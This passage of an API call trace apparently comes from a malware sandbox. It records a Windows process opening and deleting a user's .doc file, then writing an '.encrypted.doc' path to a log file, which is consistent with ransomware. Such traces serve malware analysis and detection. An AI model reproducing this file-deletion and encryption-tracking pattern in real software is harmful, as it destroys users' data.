lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0034.171] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0034.171] FreeLibrary (hLibModule=0x76b40000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.172] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.172] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.172] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.173] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\g_elj7pqzi27.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0034.173] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.173] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.173] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.173] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.173] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.174] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.174] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.174] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.174] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.174] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.174] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.174] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.174] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.174] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.174] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.174] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.174] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.174] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.174] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", lpFilePart=0x0) returned 0x68 [0034.174] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687e6f0, ftCreationTime.dwHighDateTime=0x1d5c14d, ftLastAccessTime.dwLowDateTime=0x802a9bb0, ftLastAccessTime.dwHighDateTime=0x1d5c300, ftLastWriteTime.dwLowDateTime=0x1441a340, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbd3b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="G_eLJ7pQzi27.doc", cAlternateFileName="G_ELJ7~1.DOC")) returned 0x7c2100 [0034.175] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\g_elj7pqzi27.doc")) returned 1 [0034.176] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687e6f0, ftCreationTime.dwHighDateTime=0x1d5c14d, ftLastAccessTime.dwLowDateTime=0x802a9bb0, ftLastAccessTime.dwHighDateTime=0x1d5c300, ftLastWriteTime.dwLowDateTime=0x1441a340, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbd3b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="G_eLJ7pQzi27.doc", cAlternateFileName="G_ELJ7~1.DOC")) returned 0 [0034.176] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.176] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.176] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.177] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.177] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.177] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0034.177] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.177] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.178] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0034.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.178] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.178] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.178] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.178] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.178] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0034.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.178] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.178] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x142c, lpOverlapped=0x0) returned 1 [0034.178] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.178] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x142c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.178] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.encrypted.doc\r\n", cchWideChar=117, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 117 [0034.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x75) returned 0x7800d0 [0034.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.encrypted.doc\r\n", cchWideChar=117, lpMultiByteStr=0x7800d0, cbMultiByte=117, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\G_eLJ7pQzi27.encrypted.doc\r\n", lpUsedDefaultChar=0x0) returned 117 [0034.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0034.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0034.179] WriteFile (in: hFile=0x140, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x74, lpOverlapped=0x0) returned 1 [0034.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.179] CloseHandle (hObject=0x140) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.180] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0034.180] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 